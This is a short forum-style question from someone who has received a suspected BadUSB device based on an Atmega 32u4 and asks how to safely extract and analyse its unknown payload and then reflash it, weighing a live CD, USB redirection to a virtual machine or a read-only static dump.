The situation: I received a BADUSB device probably based on Atmega 32u4, armed with some kind of payload. I’d like to extract and analyze the payload. Then I’d like to reflash the device with my own payload. What I have to do this job is my laptop, Ubuntu OS and Arduino IDE installed.
The problem: how to SECURELY examine payload under my system and then reflash the device? I’m a little bit afraid that after plugging in the device it will immediately execute its payload. What’s the right, professional DFIR approach in such situations? I thought about 3 options:
- execute payload under a live CD and somehow observe its actions
- redirect USB traffic to a safe environment like a virtual machine
- plugin badusb in read-only mode, dump payload somehow and analyze it statically
Please share your tips, I’m very very curious and keen to learn.